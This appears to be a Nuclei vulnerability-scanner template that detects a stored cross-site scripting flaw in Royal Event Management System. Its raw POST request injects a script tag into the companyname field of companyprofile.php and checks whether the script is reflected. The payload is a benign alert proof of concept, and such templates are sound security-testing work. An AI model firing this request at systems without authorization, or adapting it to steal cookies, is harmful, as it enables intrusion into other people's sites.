id: royalevent-stored-xss

info:
  name: Royal Event Management System - Stored Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    Royal Event Management System contains a stored cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
  tags: xss,unauthenticated,cms,royalevent,packetstorm

requests:
  - raw:
      - |
        POST /royal_event/companyprofile.php HTTP/1.1
        Host: {{Hostname}}

        companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&regno=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'value="><script>alert(document.domain)</script>" >'

      - type: status
        status:
          - 302

# Enhanced by mp on 2022/09/23
